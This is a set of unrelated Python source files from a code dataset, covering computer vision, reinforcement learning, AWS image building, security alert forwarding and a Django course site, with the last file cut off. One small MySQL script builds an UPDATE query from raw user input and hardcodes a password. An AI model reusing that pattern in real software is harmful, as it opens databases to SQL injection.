0:\n state[a] = 1\n state[b] = 2\n num[1].add(u)\n up1 = d[a][0] + d[a][1] - u\n num[1].add(up1)\n if not vis[up1]:\n vis[up1] = True\n dq.append(up1)\n\n num[2].add(u)\n up2 = d[b][0] + d[b][1] - u\n num[2].add(up2)\n if not vis[up2]:\n vis[up2] = True\n dq.append(up2)\n elif state[a] + state[b] == 3:\n continue\n elif state[a] == state[b]:\n valid = False\n break\n elif state[a] > 0:\n state[b] = 3 - state[a]\n num[state[b]].add(u)\n up2 = d[b][0] + d[b][1] - u\n num[state[b]].add(up2)\n if not vis[up2]:\n vis[up2] = True\n dq.append(up2)\n elif state[b] > 0:\n state[a] = 3 - state[b]\n num[state[a]].add(u)\n up1 = d[a][0] + d[a][1] - u\n num[state[a]].add(up1)\n if not vis[up1]:\n vis[up1] = True\n dq.append(up1)\n\n if not valid:\n break\n\n print('YES' if valid else 'NO')\n","repo_name":"lucifer1004/codeforces","sub_path":"1702/e/e.py","file_name":"e.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"15063188398","text":"# coding=utf-8\nfrom scipy.spatial import distance as dist\nfrom collections import OrderedDict\nimport numpy as np\n\nclass CentroidTracker:\n def __init__(self, maxDisappeared=50, maxDistance=50):\n # Inicializamos el próximo Object ID único, junto a dos diccionarios ordenados,\n # que se utilizarán para mantener constancia de los objetos que se están siguiendo\n # (y calculando su centroide), y para mantener dichos objetos que ya no son visibles\n # durante un periodo de tiempom antes de marcarlos como perdidos.\n self.nextObjectID = 0\n self.objects = OrderedDict()\n self.disappeared = OrderedDict()\n\n # Cual es el número de frames consecutivos máximo que un objeto puede estar\n # desaparecido antes de ser desregistrado como objeto.\n self.maxDisappeared = maxDisappeared\n\n self.maxDistance = maxDistance\n\n def register(self, centroid):\n # Cuando registramos un objeto, utilizamos el siguiente ID disponible\n # para almacenar su centroide.\n self.objects[self.nextObjectID] = centroid\n self.disappeared[self.nextObjectID] = 0\n self.nextObjectID += 1\n\n def deregister(self, objectID):\n # Una vez se ha dado por perdido un objeto, desregistramos su ID.\n del self.objects[objectID]\n del self.disappeared[objectID]\n\n def update(self, rects):\n # Comprobamos si la lista de bounding boxes (rects) está vacía.\n if len(rects) == 0:\n # Si teníamos algún objeto marcado como tracked, lo marcamos como desaparecido.\n for objectID in list(self.disappeared.keys()):\n self.disappeared[objectID] += 1\n # Si hemos alcanzado el máximo número de frames consecutivos,\n # desregistramos el objeto\n if self.disappeared[objectID] > self.maxDisappeared:\n self.deregister(objectID)\n # No existen centroides para trackear.\n return self.objects\n\n # Inicializamos un array para los centroides recibidos en el frame actual, y lo\n # inicializamos a 0\n inputCentroids = np.zeros((len(rects), 2), dtype=\"int\")\n\n # Iteramos sobre las bounding boxes\n for (i, (startX, startY, endX, endY)) in enumerate(rects):\n # Calculamos el centroide\n cX = int((startX + endX) / 2.0)\n cY = int((startY + endY) / 2.0)\n inputCentroids[i] = (cX, cY)\n\n # Si no estamos trackeando ningun objeto, registramos los nuevos centroides\n if len(self.objects) == 0:\n for i in range(0, len(inputCentroids)):\n self.register(inputCentroids[i])\n\n # Si ya estamos trackeando algún objeto, primero intentamos emparejar\n # los nuevos centroides con los que eisten ya de los objetos tackeados.\n else:\n # Obtenemos los IDs y centroides de los objetos\n objectIDs = list(self.objects.keys())\n objectCentroids = list(self.objects.values())\n\n # Calculamos la distancia entre cada par de centroide trackeado y\n # de nuevos centroides. Nuestro objetivo es emparejar un nuevo centroide con alguno\n # de los existentes.\n D = dist.cdist(np.array(objectCentroids), inputCentroids)\n\n # Para poder emparejarlos, debemos encontrar el valor más pequeño en cada fila,\n # y entonces ordenar la fila por indexes de menor a mayor valor. De tal forma que\n # la fila con el valor más pequeño quede al principio.\n # axis = 0 es columnas, axis = 1 es filas.\n # TODO Probar esto y que es argsort()\n\n # Después de entender mejor, esto devuelve el valor mínimo de cada fila, y además,\n # los ordena de menor a mayor, y devuelve un array del siguiente tipo, por ejemplo,\n # si tuvieramos solo 2 rows: rows = [1,0]. Es to significaría que el valor mínimo\n # se encuentra en la row 1, y el siguiente valor mínimo en la row 0, y así.\n rows = D.min(axis=1).argsort()\n\n # Después, buscamos los valores mínimos en cada columna, y ordenándolos\n # utilizando los index de las filas calculados anteriormente\n # axis = 0 es columnas, axis = 1 es filas.\n\n # Después, el argmin hace lo mismo que el min, devuelve las\n # columnas con los valores mínimos de cada fila, en el caso de tener 2 filas,\n # podría devolver algo como, cols = [1, 2], indicando que en la columna 1 se encuentra\n # el valor más pequeño de la fila 0, y en la columna 2 se encuentra el valor más pequeño\n # de la columna 1. El [rows] del final sirve para ordenar los valores por filas, por tanto\n # si el valor de la fila 1, es menor que le de la fila 0, el resultado de cols será,\n # cols = [2, 1].\n cols = D.argmin(axis=1)[rows]\n\n # Para determinar si tenemos que actualizar, registrar o desregistrar un objeto,\n # debemos trackear cual de los indexes de las filas y columnas ya hemos examinado.\n usedRows = set()\n usedCols = set()\n\n # Iteramos sobre cada tupla de combinación de index (fila, columna)\n # Zip devuelve un iterador de tuplas\n\n # Después, el zip lo que hace es combinar las filas con las columnas, si por ejemplo las\n # rows = [1, 0], y las cols = [2, 1], entonces el zip(rows, cols) = [(1, 2), (0, 1)]\n # Esto implica, que el segundo objeto existente, hará match con el tercer input centroid,\n # ya que el zip devuelve (1, 2), y del mismo modo, el primer objeto existente hará match\n # con el segundo input centroid (0, 1).\n for (row, col) in zip(rows, cols):\n\n # Si ya hemos examinado la fila o la columna, la ignoramos\n if row in usedRows or col in usedCols:\n continue\n\n # if the distance between centroids is greater than\n # the maximum distance, do not associate the two\n # centroids to the same object\n if D[row, col] > self.maxDistance:\n continue\n\n # Si no, obtenemos el objectID de la fila actual, establecemos su\n # nuevo centroide y reseteamos el contador de desaparecido.\n objectID = objectIDs[row]\n self.objects[objectID] = inputCentroids[col]\n self.disappeared[objectID] = 0\n\n # Indicamos que hemos examinado el index de la fila y la columna.\n usedRows.add(row)\n usedCols.add(col)\n\n # Calculamos el indice de la fila y columna que todavia no hemos examinado\n unusedRows = set(range(0, D.shape[0])).difference(usedRows)\n unusedCols = set(range(0, D.shape[1])).difference(usedCols)\n\n # En el caso de que el numero de centroides de objeto es mayor o igual\n # al numero de nuevos centroides, debemos comprobar si algunos objetos\n # han desaparecido\n if D.shape[0] >= D.shape[1]:\n\n # Iterar sobre las filas sin examinar\n for row in unusedRows:\n\n # Obtener el ID del objeto de la fila correspondiente\n # e incrementar el contador de desaparecido.\n objectID = objectIDs[row]\n self.disappeared[objectID] += 1\n\n # Revisamos que el contador no haya llegado a su límite, si es así\n # desregistramos el objeto\n # for warrants deregistering the object\n if self.disappeared[objectID] > self.maxDisappeared:\n self.deregister(objectID)\n\n # Si no, si el número de nuevos centroides es mayor que el número de \n # centroides registrados, debemos registrar todos los nuevos.\n else:\n for col in unusedCols:\n self.register(inputCentroids[col])\n\n # Devolvemos los objetos trackeables\n return self.objects\n","repo_name":"alu0100881165/tfg","sub_path":"centroidTrackable/centroidtracker.py","file_name":"centroidtracker.py","file_ext":"py","file_size_in_byte":8195,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39782816878","text":"import gym\nfrom stable_baselines import A2C\nfrom stable_baselines.common.vec_env import DummyVecEnv\nfrom stable_baselines.bench import Monitor\nimport numpy as np\nimport os\n\n\n# 正常的 Gym-wrapper, 没有完成任何工作\nclass CustomWrapper(gym.Wrapper):\n def __init__(self, env):\n # 输出参数只有一个, 是 env\n super(CustomWrapper, self).__init__(env)\n\n def reset(self):\n obs = self.env.reset()\n return obs\n\n def step(self, action):\n obs, reward, done, info = self.env.step(action)\n return obs, reward, done, info\n\n##############################\n# 1. 限制周期长度的wrapper\n##############################\n\n\nclass TimeLimitWrapper(gym.Wrapper):\n ## 显示了周期的最大长度. 在 init 里面初始化 max_steps, 在 step 中检测如果超过 max_steps 就将 done 设为 True\n def __init__(self, env, max_steps=100):\n super(TimeLimitWrapper, self).__init__(env)\n self.max_steps = max_steps\n self.current_step = 0\n\n def reset(self):\n self.current_step = 0\n return self.env.reset()\n\n def step(self, action):\n self.current_step += 1\n obs, reward, done, info = self.env.step(action)\n if self.current_step >= self.max_steps:\n done = True\n info['time_limit_reached'] = True\n return obs, reward, done, info\n\n\ndef test_time_limit_wrapper():\n # 100 {'time_limit_reached': True}\n env = gym.make(\"Pendulum-v0\")\n env = TimeLimitWrapper(env, max_steps=100)\n obs = env.reset()\n done = False\n n_steps = 0\n while not done:\n random_action = env.action_space.sample()\n obs, reward, done, info = env.step(random_action)\n n_steps += 1\n print(n_steps, info)\n\n##############################\n# 2. 限制动作范围的 wrapper\n##############################\n\n\nclass NormalizeActionWrapper(gym.Wrapper):\n # 将 action space 规约到 -1~1 之间\n # step 函数中, 将输入的 (-1,1) 的动作, 重新规约到原来的动作空间中, 再调用函数进行 step\n def __init__(self, env):\n # 保留原来的 action space 的范围\n action_space = env.action_space\n self.low, self.high = action_space.low, action_space.high\n # 重置 action space 为 [-1,1] 之间\n env.action_space = gym.spaces.Box(low=-1, high=1, shape=action_space.shape, dtype=np.float32)\n super(NormalizeActionWrapper, self).__init__(env)\n\n def rescale_action(self, scaled_action):\n # 将输入 x~[-1, 1] 之间的动作重新规约到 y~[self.low, high] 之间\n # y = (x-(-1))*[(high-low)/(1-(-1))]+low\n return (scaled_action + 1.0) * (self.high - self.low) * 0.5 + self.low\n\n def reset(self):\n return self.env.reset()\n\n def step(self, action):\n rescaled_action = self.rescale_action(action)\n obs, reward, done, info = self.env.step(rescaled_action)\n return obs, reward, done, info\n\n\ndef test_normalize_action_wrapper():\n # 在原始初始化的 env 中采样多个动作, 随后再 NormalizeActionWrapper 后的 env 中采样多个动作\n env = gym.make(\"Pendulum-v0\")\n print(\"original env:\", env.action_space.low, env.action_space.high)\n env.reset()\n for _ in range(5):\n print(\"sample action:\", env.action_space.sample())\n\n # wrapper\n env = NormalizeActionWrapper(env)\n env.reset()\n for _ in range(5):\n print(\"Normalized action:\", env.action_space.sample())\n\n\n##############################\n# 3. wrapper 与 stable baselines 中的 agent 结合进行训练\n##############################\n\n\n# Monitor 可以记录环境在运行过程中产生的记录 mean episode reward, mean episode length\ndef test_monitor():\n env = gym.make('Pendulum-v0')\n env = Monitor(gym.make('Pendulum-v0'), filename=None, allow_early_resets=True)\n normalized_env = NormalizeActionWrapper(env)\n normalized_env = DummyVecEnv([lambda: normalized_env])\n # model\n model_2 = A2C('MlpPolicy', normalized_env, verbose=1).learn(1000)\n\n\n################################\n# 4. VecNormalize 是 stable baselines 中提供的规约, 记录在运行过程中的 state 的 std 和 return 的 std\n################################\nfrom stable_baselines.common.vec_env import VecNormalize, VecFrameStack\n\n\ndef test_vec_normalize():\n env = DummyVecEnv([lambda: gym.make(\"Pendulum-v0\")])\n normalized_vec_env = VecNormalize(env)\n obs = normalized_vec_env.reset()\n for _ in range(10):\n action = [normalized_vec_env.action_space.sample()]\n obs, reward, _, _ = normalized_vec_env.step(action)\n print(obs, reward)\n\n################################\n# 5. VecFrameStack 用于在 Atari 将相邻几帧进行叠加\n################################\n\n\ndef test_frame_stack():\n env = DummyVecEnv([lambda: gym.make(\"Pendulum-v0\")])\n obs = env.reset()\n print(\"Before FrameStack, observation.shape =\", obs.shape) # (1, 3)\n\n frame_stack_env = VecFrameStack(env, n_stack=4) # 叠加连续的 4 帧组成状态\n obs = frame_stack_env.reset()\n print(\"After FrameStack, observation.shape =\", obs.shape) # (1, 12)\n\n\nif __name__ == '__main__':\n # test_time_limit_wrapper()\n # test_normalize_action_wrapper()\n # test_monitor()\n # test_vec_normalize()\n test_frame_stack()\n\n\n\n","repo_name":"Baichenjia/Stable-Baselines-Basic","sub_path":"4-Gym-wrapper.py","file_name":"4-Gym-wrapper.py","file_ext":"py","file_size_in_byte":5317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7059144327","text":"import pathlib\n\nimport click\nimport PyQt5.uic\n\n\n@click.command()\n@click.option(\n \"--ui\",\n \"ui_paths\",\n multiple=True,\n type=click.Path(exists=True, dir_okay=False),\n)\n@click.option(\n \"--directory\",\n \"--dir\",\n \"directories\",\n default=[\".\"],\n multiple=True,\n type=click.Path(exists=True, file_okay=False),\n)\n@click.option(\"--suffix\", default=\"_ui\")\n@click.option(\"--encoding\", default=\"utf-8\")\ndef cli(ui_paths, directories, suffix, encoding):\n ui_paths = [pathlib.Path(path) for path in ui_paths]\n\n for directory in directories:\n path = pathlib.Path(directory)\n found_paths = path.rglob(\"*.ui\")\n ui_paths.extend(found_paths)\n\n for path in ui_paths:\n in_path = path\n out_path = path.with_name(f\"{path.stem}{suffix}.py\")\n\n click.echo(f\"Converting: {in_path} -> {out_path}\")\n with open(out_path, \"w\", encoding=encoding) as out_file:\n PyQt5.uic.compileUi(in_path, out_file)\n","repo_name":"epcpower/stlib","sub_path":"epyqlib/compileui.py","file_name":"compileui.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9920674960","text":"#!/usr/bin/python2\n\nimport boto3, argparse, urllib, time, json, subprocess, os.path\nimport argparse\n\nclass Metadata(object):\n base = 'http://169.254.169.254/latest/meta-data/'\n def _get(self, what):\n return urllib.urlopen(Metadata.base + what).read()\n def instance_id(self):\n return self._get('instance-id')\n def availability_zone(self):\n return self._get('placement/availability-zone')\n def region(self):\n return self.availability_zone()[:-1]\n\ndef wait_for(ec2_obj, status='available'):\n while ec2_obj.state != status:\n #print('object status {} wanted {}'.format(ec2_obj.status, status))\n time.sleep(1)\n ec2_obj.reload()\n\n#input = '/home/ubuntu/capstan-java-example.img'\ninput = '/home/ubuntu/small-osv-node.img'\n\ndef to_gib(size):\n gib = 1 << 30\n return (size + gib - 1) >> 30\n\ndef image_size(filename):\n info = json.loads(subprocess.check_output(['qemu-img', 'info', '--output=json', filename]))\n return info['virtual-size']\n\ndef copy_image(img, out):\n subprocess.check_call(['sudo', 'cp', img, out])\n\ndef make_ami(input, name):\n metadata = Metadata()\n print('Connecting')\n conn = boto3.resource('ec2',region_name=\"us-west-2\")\n #conn = ec2.connect_to_region(metadata.region())\n print('Creating volume')\n vol = conn.create_volume(Size=to_gib(image_size(input)),\n AvailabilityZone=metadata.availability_zone(),\n )\n print('Waiting for {}'.format(vol.id))\n wait_for(vol)\n #vol = conn.describe_volumes([vol.id])[0]\n print('Attaching {} to {}'.format(vol.id, metadata.instance_id()))\n att = vol.attach_to_instance(InstanceId=metadata.instance_id(), Device='xvdf')\n while not os.path.exists('/dev/xvdf'):\n #print('waiting for volume to attach')\n time.sleep(1)\n print('Copying image')\n copy_image(input, '/dev/xvdf')\n print('Detaching {}'.format(vol.id))\n vol.detach_from_instance()\n print('Creating snapshot from {}'.format(vol.id))\n snap = vol.create_snapshot()\n #snap = conn.get_all_snapshots([snap.id])[0]\n wait_for(snap, 'completed')\n print('Deleting {}'.format(vol.id))\n vol.delete()\n print('Registering image from {}'.format(snap.id))\n ami = conn.register_image(Name=name,\n Architecture='x86_64',\n RootDeviceName='xvda',\n VirtualizationType='hvm',\n BlockDeviceMappings=[\n { \n \t\t\t\t'Ebs': {\n \t \t\t\t 'SnapshotId': snap.id,\n \t\t\t'VolumeSize': 123,\n \t\t\t 'DeleteOnTermination': True\n }\n \t\t\t},\n\t\t\t ])\n print('ami {} created\\n'.format(ami))\n return ami\n\nif __name__ == \"__main__\":\n # Parse arguments\n parser = argparse.ArgumentParser(prog='run')\n parser.add_argument(\"-n\", \"--name\", action=\"store\", default=\"test-ami\",\n help=\"ami name to be created\")\n\n args = parser.parse_args()\n make_ami(input, args.name)\n","repo_name":"ClosingBracket/osv","sub_path":"scripts/ec2-make-MY-ami.py","file_name":"ec2-make-MY-ami.py","file_ext":"py","file_size_in_byte":3127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"73897859291","text":"import mysql.connector\nconn = mysql.connector.connect(\n host=\"localhost\",\n user=\"developer\",\n password=\"12\",\n database=\"dbpython\"\n)\n\ncursor = conn.cursor()\n\nnome_produto = input(\"Insira o nome do produto que deseja alterar:\")\npergunta = input(\"Deseja alterar o valor do produto:\")\nif pergunta == 'sim' or 's':\n print(\"***Lembre-se de não utilizar virgulas para definir o valor, e sim um ponto!***\")\n valor = input(\"Insira o novo valor do produto:\")\n comando = f'UPDATE vendas SET valor = {valor} WHERE nome_produto = \"{nome_produto}\"'\n cursor.execute(comando)\n conn.commit()\n print(\"As alterações foram feitas com sucesso!\")\n\nelse:\n print(\"O Serviço de update foi finalizado sem nenhuma modificação!\")\n\ncursor.close()\nconn.close()\n","repo_name":"CloudEducationBrazil/WydenPythonParadigmas","sub_path":"08 SourceCodePython/aula26032022/deividy/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"pt","doc_type":"code","stars":11,"dataset":"github-code","pt":"32"} +{"seq_id":"13633181703","text":"# Using Divide and Conquer\nclass Solution:\n def longestCommonPrefix(self, strs) -> str:\n def commonWordBetweenTwoWords(l_str,r_str):\n longest_prefix= min(len(l_str),len(r_str))\n i=0\n while i= end:\n return strs[start]\n else:\n mid_point= (start+end)//2\n left= help_recursion(str_list,start,mid_point)\n right= help_recursion(str_list,mid_point+1,end)\n return commonWordBetweenTwoWords(left,right)\n if len(strs) == 0:\n return \"\"\n else:\n return help(strs,0,len(strs)-1)\n \n \n ","repo_name":"ruifan831/leetCodeRecord","sub_path":"14_LongestCommonPrefix.py","file_name":"14_LongestCommonPrefix.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38167151767","text":"from os import getenv\n\n# Namespace grouping the project components and RabbitMQTrigger objects\nTRIGGERS_NAMESPACE = getenv('TRIGGERS_NAMESPACE')\n\n# Group of the trigger CRD\nTRIGGERS_GROUP = getenv('TRIGGERS_GROUP')\n\n# k8s ApiVersion of the trigger CRD\nTRIGGERS_VERSION = getenv('TRIGGERS_VERSION')\n\n# Plural name of the trigger CRD\nTRIGGERS_PLURAL = getenv('TRIGGERS_PLURAL')\n\n# Name of the secret containing the triggers store\nTRIGGERS_STORE_SECRET = getenv('TRIGGERS_PLURAL')\n\n# Key in which to store the triggers global state on the secret\nTRIGGERS_SECRET_KEY = 'triggers_store'\n\n# Deployment name of the RabbitMQ events proxy\nEVENTS_PROXY_DEPLOYMENT = getenv('EVENTS_PROXY_DEPLOYMENT')\n","repo_name":"ivanvmoreno/bachelor-project","sub_path":"rabbitmq-trigger-operator/app/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16729350005","text":"#!/usr/bin/env python3\n# custom-iris.py\n# Custom Wazuh integration script to send alerts to DFIR-IRIS\n\nimport sys\nimport json\nimport requests\nfrom requests.auth import HTTPBasicAuth\n\n# Function to search for and extract the \"message\" field\ndef find_message_field(data):\n if isinstance(data, dict):\n if \"message\" in data:\n return data[\"message\"]\n for key, value in data.items():\n result = find_message_field(value)\n if result is not None:\n return result\n elif isinstance(data, list):\n for item in data:\n result = find_message_field(item)\n if result is not None:\n return result\n return None\n\n# Read parameters when integration is run\nalert_file = sys.argv[1]\napi_key = sys.argv[2]\nhook_url = sys.argv[3]\n\n# Read the alert file\nwith open(alert_file) as f:\n alert_json = json.load(f)\n\n# Extract field information\nalert_id = alert_json[\"id\"]\nalert_timestamp = alert_json[\"timestamp\"]\nalert_level = alert_json[\"rule\"][\"level\"]\nalert_title = alert_json[\"rule\"][\"description\"]\nalert_description = find_message_field(alert_json[\"data\"])\nagent_name = alert_json[\"agent\"][\"name\"]\nagent_ip = alert_json[\"agent\"][\"ip\"]\nagent_id = alert_json[\"agent\"][\"id\"]\nrule_id = alert_json[\"rule\"][\"id\"]\nrule_fires = alert_json[\"rule\"][\"firedtimes\"]\nalert_data = alert_json[\"data\"]\nalert_message = find_message_field(alert_json[\"data\"])\n\n# Convert Wazuh rule levels -> IRIS severity\nif(alert_level < 5):\n severity = 2\nelif(alert_level >= 5 and alert_level < 7):\n severity = 3\nelif(alert_level >= 7 and alert_level < 10):\n severity = 4\nelif(alert_level >= 10 and alert_level < 13):\n severity = 5\nelif(alert_level >= 13):\n severity = 6\nelse:\n severity = 1\n\n# Generate request\n# Reference: https://docs.dfir-iris.org/_static/iris_api_reference_v2.0.1.html#tag/Alerts/operation/post-case-add-alert\npayload = json.dumps({\n \"alert_title\": alert_title,\n \"alert_description\": f\"\"\"Agent ID: {agent_id}\nAgent IP: {agent_ip}\nAgent Name: {agent_name}\n\nAlert Details: {alert_description}\n\"\"\",\n \"alert_source\": \"Wazuh\",\n \"alert_source_ref\": alert_id,\n \"alert_source_link\": \"WAZUH_URL\",\n \"alert_severity_id\": severity, \n \"alert_status_id\": 2, # 'New' status\n \"alert_source_event_time\": alert_timestamp,\n \"alert_note\": \"\",\n \"alert_tags\": \"wazuh,\" + agent_name,\n \"alert_customer_id\": 1, # '1' for default 'IrisInitialClient'\n \"alert_source_content\": alert_json # raw log\n})\n\n# Send request to IRIS\nresponse = requests.post(hook_url, data=payload, headers={\"Authorization\": \"Bearer \" + api_key, \"content-type\": \"application/json\"})\n\nsys.exit(0)\n","repo_name":"maikroservice/Wazuh-IRIS-integration","sub_path":"custom-iris.py","file_name":"custom-iris.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"33835729908","text":"import pandas as pd\nfrom utils import limpar_texto\n\ndef carregar_nomes():\n nomes = pd.read_csv(\"dados/nomes.csv\")\n\n # Limpar first_name para busca\n nomes.first_name = nomes.first_name.apply(limpar_texto)\n\n return nomes\n\ndef obter_dados_por_nome(nomes, meu_nome):\n # Limpar meu_nome para busca\n meu_nome = limpar_texto(meu_nome)\n\n linha = nomes[nomes.first_name == meu_nome].iloc[0]\n \n return linha\n\ndef imprimir_saida(linha):\n texto_saida = f\"\"\"Nome: {linha.first_name}\nGênero: {linha.classification}\nProbabilidade: {linha.ratio}\nNomes alternativos: {linha.alternative_names}\"\"\"\n print(texto_saida)","repo_name":"ricardocarvalhods/projeto-zero","sub_path":"nomes.py","file_name":"nomes.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5046306189","text":"from django.shortcuts import render\nfrom django.views.generic.base import View\nfrom django.db.models import Count, Avg, Max, Min, Sum\nfrom django.core.paginator import Paginator,EmptyPage,PageNotAnInteger\nfrom django.http.response import HttpResponse\n\nfrom Organization.models import CityDict,CourseOrg,Teacher\nfrom Courses.models import Course\nfrom Openation.models import UserFavorite\nfrom Organization.pager import CustomPaginator\nfrom pure_pagination import Paginator, EmptyPage, PageNotAnInteger\nfrom Organization.ask_form import AskForm\n\n# class OrgList(View):\n# \"\"\"\n# 机构列表,不适用github的分页,我们应该怎么做\n# \"\"\"\n# def get(self,request):\n# city_list = CityDict.objects.all()\n# org_list = CourseOrg.objects.all()\n# #聚合函数\n# nums = CourseOrg.objects.aggregate(k=Count('id',distinct=True))\n#\n# #django内置的分页,用好这个,分页组件更好用了\n# # 全部数据:Org_LIST,=》得出共有多少条数据\n# # per_page: 每页显示条目数量\n# # count: 数据总个数\n# # num_pages:总页数\n# # page_range:总页数的索引范围,如: (1,10),(1,200)\n# # page: page对象(是否具有下一页;是否有上一页;)\n# current_page = request.GET.get('page')\n# # Paginator对象\n# paginator = CustomPaginator(current_page, 9, org_list, 3)\n# try:\n# # Page对象\n# posts = paginator.page(current_page)\n# # has_next 是否有下一页\n# # next_page_number 下一页页码\n# # has_previous 是否有上一页\n# # previous_page_number 上一页页码\n# # object_list 分页之后的数据列表,已经切片好的数据\n# # number 当前页\n# # paginator paginator对象\n# except PageNotAnInteger:\n# posts = paginator.page(1)\n# except EmptyPage:\n# posts = paginator.page(paginator.num_pages)\n#\n# return render(request,'org-list.html',{\n# 'city_list':city_list,\n# 'posts':posts,\n# 'nums':nums,\n# })\n\n#自定制的组件不够理想\n\n\nclass OrgList(View):\n \"\"\"\n 机构,这里这种做法,其实是不合理的\n 这里没有改他的代码了,前端不太好\n 这里是这个项目最难的地方\n \"\"\"\n def get(self, request):\n city_list = CityDict.objects.all()\n org_list = CourseOrg.objects.all()\n hot_org = org_list.order_by('-click_nums')[:5]\n #聚合函数\n city_id = request.GET.get('city',0)\n if city_id:\n org_list= org_list.filter(city_id=int(city_id)).select_related('city')\n else:\n org_list = org_list.filter().select_related('city')\n category = request.GET.get('ct','')\n if category:\n org_list = org_list.filter(category=category)\n else:\n org_list = org_list.filter()\n sorts = request.GET.get('sort','')\n if sorts:\n if sorts == 'students':\n org_list=org_list.order_by('-students')\n elif sorts == 'courses':\n org_list=org_list.order_by('-courses')\n nums = org_list.count()\n try:\n page = request.GET.get('page', 1)\n except PageNotAnInteger:\n page = 1\n # Provide Paginator with the request object for complete querystring generation\n\n #(5)每一页显示的数量\n p = Paginator(org_list,2, request=request)\n\n orgs = p.page(page)\n\n return render(request,'org-list.html',\n {\"city_list\":city_list,\n 'org_list':orgs,\n 'nums':nums,\n 'city_id':city_id,\n 'category':category,\n 'hot_org':hot_org,\n 'sort':sorts\n })\n\n\nclass UserAsk(View):\n '''\n 用户提交询问,用ajax方式提交\n '''\n def post(self,request):\n user_ask = AskForm(request.POST)\n if user_ask.is_valid():\n user_ask.save(commit=True)\n #第一种\n return HttpResponse(\"{'status':'success'}\",content_type='application/json')\n #第二种import json序列化\n else:\n return HttpResponse(\"{'status':'fail','msg':'访问出错'}\",content_type='application/json')\n\n\n#第一种方法\n# class OrgDetailHome(View):\n# def get(self,request,**kwargs):\n# for k,v in kwargs.items():\n# kwargs[k] = int(v)\n# org_id=kwargs.get('org_id',None)\n# org_course = CourseOrg.objects.filter(id = org_id).first()\n# course_detail = org_course.course_set.all()[:3]\n# return render(request,'org-homepage.html',{\"org_course\":org_course,\"course_detail\":course_detail})\n\n\n# class OrgDetailHome1(View):\n# \"\"\"\n# 差点自定义模板语言\n# \"\"\"\n# def get(self,request,org_id):\n# current_page = 'home'\n# courses_detail = Course.objects.filter(course_org__id = int(org_id)).values('name','image','students',\n# 'learn_time','course_org__name','course_org__image','fav_nums','desc','id')[:2]\n#\n# org_name = CourseOrg.objects.filter(id = int(org_id)).first()\n# teachers = org_name.teacher_set.all()[:2]\n# print(courses_detail)\n# return render(request,'org-homepage.html',{\"courses\":courses_detail,\"teachers\":teachers,\n# \"current_page\":current_page})\n\n\nclass OrgHomeView(View):\n \"\"\"\n 机构首页\n \"\"\"\n def get(self, request, org_id):\n current_page = \"home\"\n course_org = CourseOrg.objects.filter(id=int(org_id)).first()\n all_courses = course_org.course_set.all()[:3]\n all_teachers = course_org.teacher_set.all()[:1]\n has_fav = False\n print(request.user)\n if request.user.is_authenticated():\n if UserFavorite.objects.filter(user=request.user, fav_id=course_org.id, fav_type=2):\n has_fav = True\n return render(request, 'org-homepage.html', {\n 'all_courses':all_courses,\n 'all_teachers': all_teachers,\n 'course_org':course_org,\n 'current_page':current_page,\n 'has_fav':has_fav,\n })\n\n\nclass OrgCourseView(View):\n \"\"\"\n 课程机构列表页\n \"\"\"\n\n def get(self, request, org_id):\n current_page = \"course\"\n course_org = CourseOrg.objects.filter(id=int(org_id)).first()\n all_courses = course_org.course_set.all()[:3]\n all_teachers = course_org.teacher_set.all()[:1]\n has_fav = False\n if request.user.is_authenticated():\n if UserFavorite.objects.filter(user=request.user, fav_id=course_org.id, fav_type=2):\n has_fav = True\n return render(request, 'org-detail-course.html', {\n 'all_courses': all_courses,\n 'all_teachers': all_teachers,\n 'course_org': course_org,\n 'current_page': current_page,\n 'has_fav':has_fav\n })\n\n\nclass OrgDescView(View):\n\n def get(self, request, org_id):\n current_page = \"desc\"\n course_org = CourseOrg.objects.filter(id=int(org_id)).first()\n all_courses = course_org.course_set.all()[:3]\n all_teachers = course_org.teacher_set.all()[:1]\n has_fav = False\n if request.user.is_authenticated():\n if UserFavorite.objects.filter(user=request.user, fav_id=course_org.id, fav_type=2):\n has_fav = True\n return render(request, 'org-detail-desc.html', {\n 'all_courses': all_courses,\n 'all_teachers': all_teachers,\n 'course_org': course_org,\n 'current_page': current_page,\n 'has_fav':has_fav,\n })\n\n\nclass OrgTeacherView(View):\n def get(self, request, org_id):\n current_page = \"teacher\"\n course_org = CourseOrg.objects.filter(id=int(org_id)).first()\n has_fav = False\n if request.user.is_authenticated():\n if UserFavorite.objects.filter(user=request.user, fav_id=course_org.id, fav_type=2):\n has_fav = True\n all_courses = course_org.course_set.all()[:3]\n all_teachers = course_org.teacher_set.all()[:1]\n return render(request, 'org-detail-teachers.html', {\n 'all_courses': all_courses,\n 'all_teachers': all_teachers,\n 'course_org': course_org,\n 'current_page': current_page,\n 'has_fav':has_fav,\n })\n\n\nclass OrgFavView(View):\n \"\"\"用户收藏\"\"\"\n def post(self, request):\n fav_id = request.POST.get('fav_id', 0)\n fav_type = request.POST.get('fav_type', 0)\n\n if not request.user.is_authenticated():\n #判断用户登录状态\n print(request.user)\n return HttpResponse('{\"status\":\"fail\", \"msg\":\"用户未登录\"}', content_type='application/json')\n\n\n exist_records = UserFavorite.objects.filter(user=request.user, fav_id=int(fav_id), fav_type=int(fav_type))\n if exist_records:\n #如果记录已经存在, 则表示用户取消收藏\n exist_records.delete()\n if int(fav_type) == 1:\n course = Course.objects.get(id=int(fav_id))\n 